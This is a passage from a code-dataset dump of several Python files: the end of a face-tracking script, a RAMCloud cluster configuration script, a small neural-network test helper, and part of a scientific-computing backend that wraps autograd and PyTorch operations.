not None and len(faces) > 0:\n np.set_printoptions(threshold=sys.maxsize, precision=15)\n pairs = [\n (0, 16),\n (1, 15),\n (2, 14),\n (3, 13),\n (4, 12),\n (5, 11),\n (6, 10),\n (7, 9),\n (17, 26),\n (18, 25),\n (19, 24),\n (20, 23),\n (21, 22),\n (31, 35),\n (32, 34),\n (36, 45),\n (37, 44),\n (38, 43),\n (39, 42),\n (40, 47),\n (41, 46),\n (48, 52),\n (49, 51),\n (56, 54),\n (57, 53),\n (58, 62),\n (59, 61),\n (65, 63)\n ]\n points = copy.copy(faces[0].face_3d)\n for a, b in pairs:\n x = (points[a, 0] - points[b, 0]) / 2.0\n y = (points[a, 1] + points[b, 1]) / 2.0\n z = (points[a, 2] + points[b, 2]) / 2.0\n points[a, 0] = x\n points[b, 0] = -x\n points[[a, b], 1] = y\n points[[a, b], 2] = z\n points[[8, 27, 28, 29, 33, 50, 55, 60, 64], 0] = 0.0\n points[30, :] = 0.0\n with open(args.dump_points, \"w\") as fh:\n fh.write(repr(points))\n break\n failures = 0\n except Exception as e:\n if e.__class__ == KeyboardInterrupt:\n if args.silent == 0:\n print(\"Quitting\")\n break\n traceback.print_exc()\n failures += 1\n if failures > 30:\n break\n\n collected = False\n del frame\n\n duration = time.perf_counter() - frame_time\n while duration < target_duration:\n if not collected:\n gc.collect()\n collected = True\n duration = time.perf_counter() - frame_time\n sleep_time = target_duration - duration\n if sleep_time > 0:\n time.sleep(sleep_time)\n duration = time.perf_counter() - frame_time\n frame_time = time.perf_counter()\nexcept KeyboardInterrupt:\n if args.silent == 0:\n print(\"Quitting\")\n\ninput_reader.close()\nif out is not None:\n out.release()\ncv2.destroyAllWindows()\n\nif args.silent == 0 and tracking_frames > 0:\n average_tracking_time = 1000 * tracking_time / tracking_frames\n print(f\"Average tracking time per detected face: {average_tracking_time:.2f} ms\")\n print(f\"Tracking time: {total_tracking_time:.3f} s\\nFrames: {tracking_frames}\")\n","repo_name":"emilianavt/OpenSeeFace","sub_path":"facetracker.py","file_name":"facetracker.py","file_ext":"py","file_size_in_byte":25543,"program_lang":"python","lang":"en","doc_type":"code","stars":1219,"dataset":"github-code","pt":"60"} +{"seq_id":"32503957424","text":"from common import captureSh\nimport commands\nimport os\nimport re\nimport subprocess\nimport sys\n\n__all__ = ['coordinator_port', 'default_disk1','default_disk2', 'git_branch',\n 'git_ref', 'git_diff', 'obj_dir', 'obj_path', 'scripts_path',\n 'second_backup_port', 'server_port', 'top_path', 'getHosts']\n\n# git_branch is the name of the current git branch, which is used\n# for purposes such as computing objDir.\ntry:\n git_branch = re.search('^refs/heads/(.*)$',\n captureSh('git symbolic-ref -q HEAD 2>/dev/null'))\nexcept subprocess.CalledProcessError:\n git_branch = None\n obj_dir = 'obj'\nelse:\n git_branch = git_branch.group(1)\n obj_dir = 'obj.%s' % git_branch\n\n# git_ref is the id of the commit at the HEAD of the current branch.\ntry:\n git_ref = captureSh('git rev-parse HEAD 2>/dev/null')\nexcept subprocess.CalledProcessError:\n git_ref = '{{unknown commit}}'\n\n# git_diff is None if the working directory and index are clean, otherwise\n# it is a string containing the unified diff of the uncommitted changes.\ntry:\n git_diff = captureSh('git diff HEAD 2>/dev/null')\n if git_diff == '':\n git_diff = None\nexcept subprocess.CalledProcessError:\n git_diff = '{{using unknown diff against commit}}'\n\n# obj_dir is the name of the directory containing binaries for the current\n# git branch (it's just a single name such as \"obj.master\", not a full path)\nif git_branch == None:\n obj_dir = 'obj'\nelse:\n obj_dir = 'obj.%s' % git_branch\n\n# The full path name of the directory containing this script file.\nscripts_path = os.path.dirname(os.path.abspath(__file__))\n\n# The full pathname of the parent of scriptsPath (the top-level directory\n# of a RAMCloud source tree).\ntop_path = os.path.abspath(scripts_path + '/..')\n\n# Add /usr/local/lib to LD_LIBARY_PATH it isn't already there (this was\n# needed for CentOS 5.5, but should probably be deleted now).\ntry:\n ld_library_path = os.environ['LD_LIBRARY_PATH'].split(':')\nexcept KeyError:\n ld_library_path = []\nif '/usr/local/lib' not in ld_library_path:\n ld_library_path.insert(0, '/usr/local/lib')\nos.environ['LD_LIBRARY_PATH'] = ':'.join(ld_library_path)\n\n# Host on which old master is run for running recoveries.\n# Need not be a member of hosts\n# hosts = None\nold_master_host = ('rcmaster', '192.168.1.1', 81)\n\n# Full path to the directory containing RAMCloud executables.\nobj_path = '%s/%s' % (top_path, obj_dir)\n\n# Ports (for TCP, etc.) to use for each kind of server.\ncoordinator_port = 12246\nserver_port = 12247\nsecond_backup_port = 12248\n\n# Command-line argument specifying where the first backup on each\n# server should storage the segment replicas.\ndefault_disk1 = '-f /dev/sda2'\n\n# Command-line argument specifying where the second backup should\n# store its segment replicas.\ndefault_disk2 = '-f /dev/sdb2'\n\n# Try to include local overrides.\ntry:\n from localconfig import *\nexcept ImportError:\n pass\n\n\n# Returns a list of the hosts available for servers or clients;\n# each entry consists of a name for the host (for ssh), an IP address\n# to use for creating service locators, and an id for generating\n# Ethernet addresses.\n#\n# By default, the function will return a list generated from servers\n# locked by the current user in rcres (an RAMCloud internal utility).\n# If rcres is not available, a custom list can be defined in\n# localconfig.py (see below and the wiki for additional instructions).\n# In the event that rcres is available and a custom list is defined,\n# the function will validate the custom list against rcres.\n#\n# Example for constructing a custom list in localconfig.py:\n# hosts = []\n# for i in range(1, 61):\n# hosts.append(('rc%02d' % i,\n# '192.168.1.%d' % (100 + i),\n# i))\n\ndef getHosts():\n # Find servers locked by user via rcres\n rcresOutput = commands.getoutput('rcres ls -l | grep \"$(whoami)\" | cut -c13-16 | grep \"rc[0-9]\" | cut -c3-4')\n rcresFailed = re.match(\".*not found.*\", rcresOutput)\n\n # If hosts overridden in localconfig.py, check that all servers are locked\n if 'hosts' in globals():\n requstedUnlockedHosts = []\n for host in hosts:\n if str(\"%02d\" % host[2]) not in rcresOutput.split():\n requstedUnlockedHosts.append(host[0])\n\n if not rcresFailed and len(requstedUnlockedHosts) > 0:\n raise Exception (\"Manually defined hosts list in localconfig.py includes the \"\n \"following servers not locked by user in rcres:\\r\\n\\t%s\" % requstedUnlockedHosts)\n\n return hosts\n\n # hosts has not been overridden, check that rcres has some servers for us\n else:\n if rcresFailed:\n raise Exception (\"config.py could not invoke rcres (%s);\\r\\n\"\n \"\\tplease specify a custom hosts list in scripts/localconfig.py\" % rcresOutput)\n\n if len(rcresOutput) == 0:\n raise Exception (\"config.py found 0 rcXX servers locked in rcres;\\r\\n\"\n \"\\tcheck your locks or specify a custom hosts list in scripts/localconfig.py\")\n\n # Everything checks out, build list\n serverList = []\n for hostNum in rcresOutput.split():\n i = int(hostNum)\n serverList.append(('rc%02d' % i,\n '192.168.1.%d' % (100 + i),\n i))\n return serverList\n\nif __name__ == '__main__':\n print('\\n'.join([s[0] for s in getHosts()]))\n","repo_name":"alexandermerritt/ramcloud","sub_path":"scripts/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5317,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"12547372042","text":"import torch\nimport matplotlib as plt\nfrom sklearn.metrics import accuracy_score\n\ndef test_predictions(model, X_test):\n predictions=[]\n with torch.no_grad():\n for i,data in enumerate(X_test):\n y_pred=model(data)\n predictions.append(y_pred.argmax().item())\n return predictions\n\n# Confusion Matrix\ndef con_matrix(y_test, predictions):\n cm = confusion_matrix(y_test,predictions)\n plt.pyplot.figure(figsize=(10,6))\n sns.heatmap(cm,annot=True)\n plt.pyplot.xlabel('Actual Values')\n plt.pyplot.ylabel('Predicted Values')\n plt.pyplot.show()\n\ndef acc_score(y_test, predictions):\n return accuracy_score(y_test,predictions)\n","repo_name":"shaakirag/Project.ANN_DataVisualization","sub_path":"prediction_ann/model_ann/ann_test.py","file_name":"ann_test.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"4734958378","text":"import warnings\nimport os\nimport gc\nimport numpy as np\nimport scipy\nimport scipy.signal\n\nimport adorym.global_settings as global_settings\n\nengine_dict = {}\ntry:\n import autograd.numpy as anp\n import autograd as ag\n engine_dict['autograd'] = anp\n flag_autograd_avail = True\nexcept:\n warnings.warn('Autograd backend is not available.')\n flag_autograd_avail = False\ntry:\n import torch as tc\n import torch.autograd as tag\n engine_dict['pytorch'] = tc\n flag_pytorch_avail = True\nexcept:\n warnings.warn('PyTorch backend is not available.')\n flag_pytorch_avail = False\n\n\nfunc_mapping_dict = {'zeros': {'autograd': 'zeros', 'tensorflow': 'zeros', 'pytorch': 'zeros', 'numpy': 'zeros'},\n 'ones': {'autograd': 'ones', 'tensorflow': 'ones', 'pytorch': 'ones', 'numpy': 'ones'},\n 'zeros_like': {'autograd': 'zeros_like', 'tensorflow': 'zeros_like', 'pytorch': 'zeros_like', 'numpy': 'zeros_like'},\n 'ones_like': {'autograd': 'ones_like', 'tensorflow': 'ones_like', 'pytorch': 'ones_like', 'numpy': 'ones_like'},\n 'stack': {'autograd': 'stack', 'tensorflow': 'stack', 'pytorch': 'stack', 'numpy': 'stack'},\n 'concatenate': {'autograd': 'concatenate','tensorflow': 'cat', 'pytorch': 'cat', 'numpy': 'concatenate'},\n 'exp': {'autograd': 'exp', 'tensorflow': 'exp', 'pytorch': 'exp'},\n 'log': {'autograd': 'log', 'tensorflow': 'log', 'pytorch': 'log'},\n 'round': {'autograd': 'round', 'tensorflow': 'round', 'pytorch': 'round'},\n 'clip': {'autograd': 'clip', 'tensorflow': 'clip', 'pytorch': 'clamp'},\n 'reshape': {'autograd': 'reshape', 'tensorflow': 'reshape', 'pytorch': 'reshape'},\n 'floor': {'autograd': 'floor', 'tensorflow': 'floor', 'pytorch': 'floor'},\n 'ceil': {'autograd': 'ceil', 'tensorflow': 'ceil', 'pytorch': 'ceil'},\n 'sqrt': {'autograd': 'sqrt', 'tensorflow': 'sqrt', 'pytorch': 'sqrt'},\n 'real': {'autograd': 'real', 'tensorflow': 'real', 'pytorch': 'real'},\n 'imag': {'autograd': 'imag', 'tensorflow': 'imag', 'pytorch': 'imag'},\n 'sin': {'autograd': 'sin', 'tensorflow': 'sin', 'pytorch': 'sin', 'numpy': 'sin'},\n 'cos': {'autograd': 'cos', 'tensorflow': 'cos', 'pytorch': 'cos', 'numpy': 'cos'},\n 'abs': {'autograd': 'abs', 'tensorflow': 'abs', 'pytorch': 'abs', 'numpy': 'abs'},\n 'sum': {'autograd': 'sum', 'tensorflow': 'reduce_sum', 'pytorch': 'sum'},\n 'prod': {'autograd': 'prod', 'tensorflow': 'prod', 'pytorch': 'prod'},\n 'arctan2': {'autograd': 'arctan2', 'tensorflow': 'atan2', 'pytorch': 'atan2'},\n 'nonzero': {'autograd': 'nonzero', 'tensorflow': 'nonzero', 'pytorch': 'nonzero'},\n 'sign': {'autograd': 'sign', 'tensorflow': 'sign', 'pytorch': 'sign', 'numpy': 'sign'},\n 'argmax': {'autograd': 'argmax', 'tensorflow': 'argmax', 'pytorch': 'argmax', 'numpy': 'argmax'},\n 'tensordot': {'autograd': 'tensordot', 'tensorflow': 'tensordot', 'pytorch': 'tensordot', 'numpy': 'tensordot'},\n }\n\ndtype_mapping_dict = {'float32': {'autograd': 'float32', 'tensorflow': 'float32', 'pytorch': 'float', 'numpy': 'float32'},\n 'float64': {'autograd': 'float64', 'tensorflow': 'float64', 'pytorch': 'double', 'numpy': 'float64'},\n 'float16': {'autograd': 'float16', 'tensorflow': 'float16', 'pytorch': 'half', 'numpy': 'float16'},\n 'int8': {'autograd': 'int8', 'tensorflow': 'int8', 'pytorch': 'int8', 'numpy': 'int8'},\n 'int16': {'autograd': 'int16', 'tensorflow': 'int16', 'pytorch': 'short', 'numpy': 'int16'},\n 'int32': {'autograd': 'int32', 'tensorflow': 'int32', 'pytorch': 'int', 'numpy': 'int32'},\n 'int64': {'autograd': 'int64', 'tensorflow': 'int64', 'pytorch': 'long', 'numpy': 'int64'},\n 'bool': {'autograd': 'bool', 'tensorflow': 'bool', 'pytorch': 'bool', 'numpy': 'bool'},\n }\n\nif flag_pytorch_avail:\n try:\n pytorch_dtype_query_mapping_dict = {tc.float32: 'float32',\n tc.float64: 'float64',\n 'float32': 'float32',\n 'float64': 'float64',\n 'single': 'float32',\n 'double': 'float64'}\n except:\n pass\n\n\ndef set_bn(f):\n def func(*args, override_backend=None, **kwargs):\n if 'backend' in kwargs.keys():\n # If \"backend\" in the wrapper function is specified by user, it overrides the\n # \"override_backend\" argument in the decorator.\n pass\n else:\n # If \"backend\" in the wrapper function is not specified, check if \"override_backend\"\n # argument in the decorator.\n # If so, use its value for the wrappers \"backend\" argument.\n # If not, use global setting.\n kwargs['backend'] = override_backend if override_backend is not None else global_settings.backend\n return f(*args, **kwargs)\n return func\n\n# _____________\n# |Flow control|_____________________________________________________________\n\nclass EmptyWith(object):\n def __init__(self):\n pass\n \n def __enter__(self):\n pass\n \n def __exit__(self, exc_type, exc_value, tb):\n pass\n\n@set_bn\ndef create_variable(arr, dtype='float32', device=None, requires_grad=True, backend='autograd'):\n \"\"\"\n Create a variable wrapper.\n :param arr: Numpy array of the intial value.\n :param dtype: str; Data type.\n :param device: A device object from PyTorch, etc. Use None for CPU.\n \"\"\"\n args = {}\n if backend == 'autograd':\n if dtype is not None:\n args['dtype'] = dtype_mapping_dict[dtype]['autograd']\n var = anp.array(arr, **args)\n elif backend == 'pytorch':\n if dtype is not None:\n args['dtype'] = getattr(engine_dict['pytorch'], dtype_mapping_dict[dtype]['pytorch'])\n if device is not None:\n args['device'] = device\n args['requires_grad'] = requires_grad\n var = tc.tensor(arr, **args)\n return var\n\n\n@set_bn\ndef create_constant(arr, dtype='float32', device=None, backend='autograd'):\n \"\"\"\n Create a variable wrapper.\n :param arr: Numpy array of the intial value.\n :param dtype: str; Data type.\n :param device: A device object from PyTorch, etc. Use None for CPU.\n \"\"\"\n args = {}\n if backend == 'autograd':\n if dtype is not None:\n args['dtype'] = dtype_mapping_dict[dtype]['autograd']\n var = np.array(arr, **args)\n elif backend == 'pytorch':\n if dtype is not None:\n args['dtype'] = getattr(engine_dict['pytorch'], dtype_mapping_dict[dtype]['pytorch'])\n if device is not None:\n args['device'] = device\n args['requires_grad'] = False\n var = tc.tensor(arr, **args)\n else:\n if dtype is not None:\n args['dtype'] = dtype_mapping_dict[dtype]['autograd']\n var = np.array(arr, **args)\n return var\n\n\n@set_bn\ndef to_numpy(var, backend='autograd'):\n if isinstance(var, np.ndarray):\n return var\n elif isinstance(var, np.float64):\n return var\n else:\n if backend == 'autograd':\n return var._value\n elif backend == 'pytorch':\n if var.device.type == 'cpu':\n return var.data.numpy()\n else:\n return var.cpu().data.numpy()\n\n\n@set_bn\ndef to_cpu(var, backend='autograd'):\n if isinstance(var, np.ndarray):\n return var\n elif isinstance(var, np.float64):\n return var\n else:\n if backend == 'autograd':\n return var\n elif backend == 'pytorch':\n if var.device.type == 'cpu':\n return var\n else:\n return var.cpu()\n\n\n@set_bn\ndef to_gpu(var, device='cuda:0', backend='autograd'):\n if isinstance(var, np.ndarray):\n return var\n elif isinstance(var, np.float64):\n return var\n else:\n if backend == 'autograd':\n return var\n elif backend == 'pytorch':\n if var.device.type == 'cuda':\n return var\n else:\n return var.cuda(device=device)\n\n\n@set_bn\ndef get_device(index=None, backend='autograd'):\n \"\"\"\n Get device object.\n :param index: index of GPU. Set to None if the tensor is kept on host.\n \"\"\"\n if backend == 'autograd': return None\n elif backend == 'pytorch':\n if index is None: return None\n else:\n return tc.device('cuda:{}'.format(index))\n\n\n@set_bn\ndef get_var_device(var, backend='autograd'):\n if backend == 'autograd':\n return None\n elif backend == 'pytorch':\n return var.device\n\n\n@set_bn\ndef get_var_device_type(var, backend='autograd'):\n if backend == 'autograd':\n return 'cpu'\n elif backend == 'pytorch':\n return var.device.type\n\n\n@set_bn\ndef set_device(device, backend='autograd'):\n \"\"\"\n Set device object. Not useful is backend is Autograd.\n :param device: Device object. Set to None if the tensor is kept on host.\n \"\"\"\n if backend == 'autograd':\n return None\n elif backend == 'pytorch':\n try:\n tc.cuda.set_device(device)\n except:\n pass\n\n\n@set_bn\ndef prepare_loss_node(loss, opt_args_ls=None, backend='autograd'):\n if backend == 'autograd':\n return ag.grad(loss, opt_args_ls)\n elif backend == 'pytorch':\n return loss\n\n\n@set_bn\ndef get_gradients(loss_node, opt_args_ls=None, backend='autograd', **kwargs):\n \"\"\"\n Get gradient.\n\n :param loss_node: Callable. A function which, given arguments in kwargs, returns the loss.\n :param opt_args_ls: List of Int. Indices of optimizable variables in the loss function's argument list.\n :param backend: Backend.\n :param kwargs: Keyword arguments of the loss function.\n :return: A list of gradients.\n \"\"\"\n if backend == 'autograd':\n # For Autograd, loss_node is the grad function that takes the loss function arguments and\n # returns the gradients.\n return loss_node(*list(kwargs.values()))\n elif backend == 'pytorch':\n # For PyTorch, loss_node is the loss function itself.\n l = loss_node(**kwargs)\n kwargs_ls = list(kwargs.values())\n dx_ls = []\n for i, node in enumerate(kwargs_ls):\n if i in opt_args_ls: dx_ls.append(node)\n grads = tag.grad(l, dx_ls, retain_graph=True, create_graph=False, allow_unused=False)\n # grads = []\n # l.backward(retain_graph=True)\n # for n in dx_ls:\n # print(n.grad)\n # grads.append(n.grad)\n l.detach()\n del l\n\n return grads\n\n\n@set_bn\ndef vjp(func, x, backend='autograd'):\n \"\"\"\n Returns a constructor that would generate a function that computes the VJP between its argument and the\n Jacobian of func.\n :param func: Function handle of loss function.\n :param x: List. A list of all arguments to func. The order of arguments must match.\n :return: The returned constructor receives the input of the differentiated function as input, and the function it returns\n receives the (adjoint) vector as input.\n \"\"\"\n if backend == 'autograd':\n return ag.make_vjp(func, x)\n elif backend == 'pytorch':\n raise NotImplementedError('VJP for Pytorch backend is not implemented yet.')\n\n\n@set_bn\ndef jvp(func, x, backend='autograd'):\n \"\"\"\n Returns a constructor that would generate a function that computes the JVP between its argument and the\n Jacobian of func.\n :param func: Function handle of loss function.\n :param x: List. A list of all arguments to func. The order of arguments must match.\n :return: The returned constructor receives the input of the differentiated function as input, and the function it returns\n receives the (adjoint) vector as input.\n \"\"\"\n if backend == 'autograd':\n return ag.differential_operators.make_jvp_reversemode(func, x)\n elif backend == 'pytorch':\n raise NotImplementedError('VJP for Pytorch backend is not implemented yet.')\n\n\n@set_bn\ndef hvp(func, x, backend='autograd'):\n \"\"\"\n Returns a constructor that would generate a function that computes the HVP between its argument and the\n Hessian of func.\n :param func: Function handle of loss function.\n :param x: List. A list of all arguments to func. The order of arguments must match.\n :return: The returned constructor receives the input of the differentiated function as input, and the function it returns\n receives the (adjoint) vector as input.\n \"\"\"\n if backend == 'autograd':\n return ag.differential_operators.make_hvp(func, x)\n elif backend == 'pytorch':\n raise NotImplementedError('VJP for Pytorch backend is not implemented yet.')\n\n\n@set_bn\ndef get_gpu_memory_usage_mb(backend='autograd'):\n if backend == 'autograd':\n return 0\n elif backend == 'pytorch':\n return tc.cuda.memory_allocated() / 1024 ** 2\n\n\n@set_bn\ndef get_gpu_memory_cache_mb(backend='autograd'):\n if backend == 'autograd':\n return 0\n elif backend == 'pytorch':\n return tc.cuda.memory_cached() / 1024 ** 2\n\n\n@set_bn\ndef get_peak_gpu_memory_usage_mb(backend='autograd'):\n if backend == 'autograd':\n return 0\n elif backend == 'pytorch':\n return tc.cuda.max_memory_allocated() / 1024 ** 2\n\n@set_bn\ndef collect_gpu_garbage(backend='autograd'):\n if backend == 'autograd':\n pass\n elif backend == 'pytorch':\n tc.cuda.empty_cache()\n\n@set_bn\ndef get_allocated_tensors(backend='autograd'):\n\n def _getr(slist, olist, seen):\n for e in slist:\n if id(e) in seen:\n continue\n seen[id(e)] = None\n olist.append(e)\n tl = gc.get_referents(e)\n if tl:\n _getr(tl, olist, seen)\n\n def get_all_objects():\n \"\"\"Return a list of all live Python\n objects, not including the list itself.\"\"\"\n gcl = gc.get_objects()\n olist = []\n seen = {}\n # Just in case:\n seen[id(gcl)] = None\n seen[id(olist)] = None\n seen[id(seen)] = None\n # _getr does the real work.\n _getr(gcl, olist, seen)\n return olist\n\n if backend == 'pytorch':\n objects = get_all_objects()\n for obj in objects:\n try:\n if tc.is_tensor(obj) or (hasattr(obj, 'data') and tc.is_tensor(obj.data)):\n print(type(obj), obj.shape, obj.device)\n except:\n pass\n\n@set_bn\ndef no_grad(backend='autograd'):\n if backend == 'pytorch':\n return tc.no_grad()\n else:\n return EmptyWith()\n\n@set_bn\ndef detach(var, backend='autograd'):\n if backend == 'pytorch':\n var.requires_grad_(False)\n return var\n else:\n return var\n\n@set_bn\ndef reattach(var, backend='autograd'):\n if backend == 'pytorch':\n var.requires_grad_()\n return var\n else:\n return var\n\n# ________________\n# |Maths functions|_____________________________________________________________\n\n@set_bn\ndef get_dtype(arr, backend='autograd'):\n \"\"\"\n Get dtype of array in standard string format ('float32', 'float64' etc.)\n\n :param arr: Tensor.\n :return: Dtype string.\n \"\"\"\n if backend == 'pytorch':\n return pytorch_dtype_query_mapping_dict[arr.dtype]\n elif backend == 'autograd':\n return str(arr.dtype)\n\n@set_bn\ndef zeros(shape, dtype=None, device=None, requires_grad=True, backend='autograd'):\n kwargs = {}\n if dtype is not None: kwargs['dtype'] = dtype\n func = getattr(engine_dict[backend], func_mapping_dict['zeros'][backend])\n if backend == 'pytorch':\n if dtype is not None: kwargs['dtype'] = getattr(engine_dict['pytorch'], dtype_mapping_dict[dtype]['pytorch'])\n arr = func(shape, device=device, requires_grad=requires_grad, **kwargs)\n else:\n arr = func(shape, **kwargs)\n return arr\n\n\n@set_bn\ndef ones(shape, dtype=None, device=None, requires_grad=True, backend='autograd'):\n kwargs = {}\n if dtype is not None: kwargs['dtype'] = dtype\n func = getattr(engine_dict[backend], func_mapping_dict['ones'][backend])\n if backend == 'pytorch':\n if dtype is not None: kwargs['dtype'] = getattr(engine_dict['pytorch'], dtype_mapping_dict[dtype]['pytorch'])\n arr = func(shape, device=device, requires_grad=requires_grad, **kwargs)\n else:\n arr = func(shape, **kwargs)\n return arr\n\n\n@set_bn\ndef zeros_like(var, dtype=None, device=None, requires_grad=True, backend='autograd'):\n \"\"\"\n :param var: ADVariable or tensor.\n \"\"\"\n kwargs = {}\n if dtype is not None: kwargs['dtype'] = dtype\n func = getattr(engine_dict[backend], func_mapping_dict['zeros_like'][backend])\n if backend == 'pytorch':\n if dtype is not None: kwargs['dtype'] = getattr(engine_dict['pytorch'], dtype_mapping_dict[dtype]['pytorch'])\n arr = func(var, device=device, requires_grad=requires_grad, **kwargs)\n else:\n arr = func(var, **kwargs)\n return arr\n\n\n@set_bn\ndef ones_like(var, dtype=None, device=None, requires_grad=True, backend='autograd'):\n \"\"\"\n :param var: ADVariable or tensor.\n \"\"\"\n kwargs = {}\n if dtype is not None: kwargs['dtype'] = dtype\n func = getattr(engine_dict[backend], func_mapping_dict['ones_like'][backend])\n if backend == 'pytorch':\n if dtype is not None: kwargs['dtype'] = getattr(engine_dict['pytorch'], dtype_mapping_dict[dtype]['pytorch'])\n arr = func(var, device=device, requires_grad=requires_grad, **kwargs)\n else:\n arr = func(var, **kwargs)\n return arr\n\n\n@set_bn\ndef exp(var, backend='autograd'):\n func = getattr(engine_dict[backend], func_mapping_dict['exp'][backend])\n arr = func(var)\n return arr\n\n\n@set_bn\ndef log(var, backend='autograd'):\n func = getattr(engine_dict[backend], func_mapping_dict['log'][backend])\n arr = func(var)\n return arr\n\n\n@set_bn\ndef sign(var, backend='autograd'):\n func = getattr(engine_dict[backend], func_mapping_dict['sign'][backend])\n arr = func(var)\n return arr\n\n\n@set_bn\ndef sin(var, backend='autograd'):\n func = getattr(engine_dict[backend], func_mapping_dict['sin'][backend])\n arr = func(var)\n return arr\n\n\n@set_bn\ndef cos(var, backend='autograd'):\n func = getattr(engine_dict[backend], func_mapping_dict['cos'][backend])\n arr = func(var)\n return arr\n\n\n@set_bn\ndef exp_complex(var_real, var_imag, backend='autograd'):\n if backend == 'pytorch':\n if not isinstance(var_real, tc.Tensor):\n var_real = tc.tensor(var_real)\n if not isinstance(var_imag, tc.Tensor):\n var_real = tc.tensor(var_imag)\n e = exp(var_real)\n return e * cos(var_imag), e * sin(var_imag)\n\n\n@set_bn\ndef arange(*args, **kwargs):\n backend = kwargs['backend']\n del kwargs['backend']\n if backend == 'pytorch':\n return tc.arange(*args, **kwargs)\n elif backend == 'autograd':\n return anp.arange(*args, **kwargs)\n\n\n@set_bn\ndef abs(var, backend='autograd'):\n func = getattr(engine_dict[backend], func_mapping_dict['abs'][backend])\n arr = func(var)\n return arr\n\n\n@set_bn\ndef stack(var_list, axis=0, backend='autograd'):\n func = getattr(engine_dict[backend], func_mapping_dict['stack'][backend])\n arr = func(var_list, axis)\n return arr\n\n\n@set_bn\ndef concatenate(var_list, axis=0, backend='autograd'):\n func = getattr(engine_dict[backend], func_mapping_dict['concatenate'][backend])\n arr = func(var_list, axis)\n return arr\n\n\n@set_bn\ndef cast(var, dtype, backend='autograd'):\n dtype = str(dtype)\n if backend == 'autograd':\n return var.astype(dtype)\n elif backend == 'pytorch':\n return getattr(var, dtype_mapping_dict[dtype]['pytorch'])()\n elif backend == 'numpy':\n return var.astype(dtype)\n\n\n@set_bn\ndef round(var, backend='autograd'):\n func = getattr(engine_dict[backend], func_mapping_dict['round'][backend])\n arr = func(var)\n return arr\n\n\n@set_bn\ndef fix(a, backend='autograd'):\n if backend == 'pytorch':\n return tc.trunc(a)\n elif backend == 'autograd':\n return anp.fix(a)\n\n\n@set_bn\ndef round_and_cast(var, dtype='int32', backend='autograd'):\n return cast(round(var), dtype=dtype, override_backend=backend)\n\n\n@set_bn\ndef fft(var_real, var_imag, axis=-1, backend='autograd', normalize=False):\n norm = None if not normalize else 'ortho'\n var = var_real + 1j * var_imag\n if backend == 'autograd':\n var = anp.fft.fft(var, axis=axis, norm=norm)\n return anp.real(var), anp.imag(var)\n elif backend == 'pytorch':\n var = tc.fft.fft(var, dim=axis, norm=norm)\n var_real, var_imag = tc.real(var), tc.imag(var)\n return var_real, var_imag\n\n\n@set_bn\ndef ifft(var_real, var_imag, axis=-1, backend='autograd', normalize=False):\n norm = None if not normalize else 'ortho'\n var = var_real + 1j * var_imag\n if backend == 'autograd':\n var = anp.fft.ifft(var, axis=axis, norm=norm)\n return anp.real(var), anp.imag(var)\n elif backend == 'pytorch':\n var = tc.fft.ifft(var, dim=axis, norm=norm)\n var_real, var_imag = tc.real(var), tc.imag(var)\n return var_real, var_imag\n\n\n@set_bn\ndef fft2(var_real, var_imag, axes=(-2, -1), backend='autograd', normalize=False):\n norm = None if not normalize else 'ortho'\n var = var_real + 1j * var_imag\n if backend == 'autograd':\n var = anp.fft.fft2(var, axes=axes, norm=norm)\n return anp.real(var), anp.imag(var)\n elif backend == 'pytorch':\n var = tc.fft.fft2(var, dim=axes, norm=norm)\n var_real, var_imag = tc.real(var), tc.imag(var)\n return var_real, var_imag\n\n\n@set_bn\ndef ifft2(var_real, var_imag, axes=(-2, -1), backend='autograd', normalize=False):\n norm = None if not normalize else 'ortho'\n var = var_real + 1j * var_imag\n if backend == 'autograd':\n var = anp.fft.ifft2(var, axes=axes, norm=norm)\n return anp.real(var), anp.imag(var)\n elif backend == 'pytorch':\n var = tc.fft.ifft2(var, dim=axes, norm=norm)\n var_real, var_imag = tc.real(var), tc.imag(var)\n return var_real, var_imag\n\n\n@set_bn\ndef fft2_and_shift(var_real, var_imag, axes=(-2, -1), backend='autograd', normalize=False):\n norm = None if not normalize else 'ortho'\n var = var_real + 1j * var_imag\n if backend == 'autograd':\n var = anp.fft.fftshift(anp.fft.fft2(var, axes=axes, norm=norm), axes=axes)\n return anp.real(var), anp.imag(var)\n elif backend == 'pytorch':\n var = tc.fft.fft2(var, dim=axes, norm=norm)\n var_real, var_imag = tc.real(var), tc.imag(var)\n var_real = var_real\n var_imag = var_imag\n var_real = fftshift(var_real, axes=axes)\n var_imag = fftshift(var_imag, axes=axes)\n return var_real, var_imag\n\n\n@set_bn\ndef ifft2_and_shift(var_real, var_imag, axes=(-2, -1), backend='autograd', normalize=False):\n norm = None if not normalize else 'ortho'\n var = var_real + 1j * var_imag\n if backend == 'autograd':\n var = anp.fft.fftshift(anp.fft.ifft2(var, axes=axes, norm=norm), axes=axes)\n return anp.real(var), anp.imag(var)\n elif backend == 'pytorch':\n var = tc.fft.ifft2(var, dim=axes, norm=norm)\n var_real, var_imag = tc.real(var), tc.imag(var)\n var_real = var_real\n var_imag = var_imag\n var_real = fftshift(var_real, axes=axes)\n var_imag = fftshift(var_imag, axes=axes)\n return var_real, var_imag\n\n\n@set_bn\ndef ishift_and_ifft2(var_real, var_imag, axes=(-2, -1), backend='autograd', normalize=False):\n norm = None if not normalize else 'ortho'\n var = var_real + 1j * var_imag\n if backend == 'autograd':\n var = anp.fft.ifft2(anp.fft.ifftshift(var, axes=axes), axes=axes, norm=norm)\n return anp.real(var), anp.imag(var)\n elif backend == 'pytorch':\n var = tc.fft.ifft2(tc.fft.ifftshift(var, dim=axes), dim=axes, norm=norm)\n var_real, var_imag = tc.real(var), tc.imag(var)\n var_real = var_real\n var_imag = var_imag\n return var_real, var_imag\n\n\n@set_bn\ndef convolve_with_transfer_function(arr_real, arr_imag, h_real, h_imag, axes=(-2, -1), backend='autograd'):\n f_real, f_imag = fft2(arr_real, arr_imag, axes=axes, override_backend=backend)\n fh_real = f_real * h_real - f_imag * h_imag\n fh_imag = f_real * h_imag + f_imag * h_real\n return ifft2(fh_real, fh_imag, override_backend=backend)\n\n\n@set_bn\ndef convolve_with_impulse_response(arr_real, arr_imag, h_real, h_imag, axes=(-2, -1), backend='autograd', normalize=True):\n f_real, f_imag = fft2(arr_real, arr_imag, axes=axes, override_backend=backend, 